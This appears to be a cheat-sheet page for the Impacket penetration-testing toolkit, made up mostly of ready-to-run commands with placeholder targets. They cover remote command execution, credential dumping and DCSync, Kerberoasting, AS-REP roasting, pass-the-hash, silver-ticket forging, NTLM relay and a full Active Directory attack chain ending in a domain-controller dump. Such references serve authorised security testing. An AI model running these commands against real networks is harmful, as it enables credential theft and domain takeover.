Description
Impacket is a collection of Python classes for working with network protocols. It provides tools for SMB, MSRPC, Kerberos, LDAP, and more, and is essential for Active Directory pentesting through tools such as psexec, secretsdump, and GetUserSPNs.
Installation
BASH
pip install impacket
# Or
git clone https://github.com/fortra/impacket && cd impacket
pip install .
Basic Usage
BASH
# Remote command execution
impacket-psexec domain/user:password@<IP>
impacket-wmiexec domain/user:password@<IP>
impacket-smbexec domain/user:password@<IP>
# Credential dump
impacket-secretsdump domain/user:password@<IP>
# Kerberoasting
impacket-GetUserSPNs domain/user:password -dc-ip <DC_IP> -request
Advanced Usage
BASH
# Pass-the-Hash
impacket-psexec -hashes :NTLM_HASH domain/admin@<IP>
# DCSync
impacket-secretsdump -just-dc domain/admin:password@<DC_IP>
# AS-REP Roasting
impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip <DC_IP> -format hashcat
# Silver Ticket
impacket-ticketer -nthash <service_hash> -domain-sid <SID> -domain domain.local -spn <SPN> user
# NTLM Relay
impacket-ntlmrelayx -tf targets.txt -smb2support --sam
# MSSQL client
impacket-mssqlclient user:password@<IP>
# SMB client
impacket-smbclient domain/user:password@<IP>
Common Workflows
BASH
# AD attack chain
impacket-GetUserSPNs domain/user:pass -request # Kerberoast
hashcat -m 13100 hashes.txt rockyou.txt # Crack
impacket-psexec domain/svc_account:cracked_pass@<IP> # Shell
impacket-secretsdump domain/admin:pass@<DC_IP> # Dump DC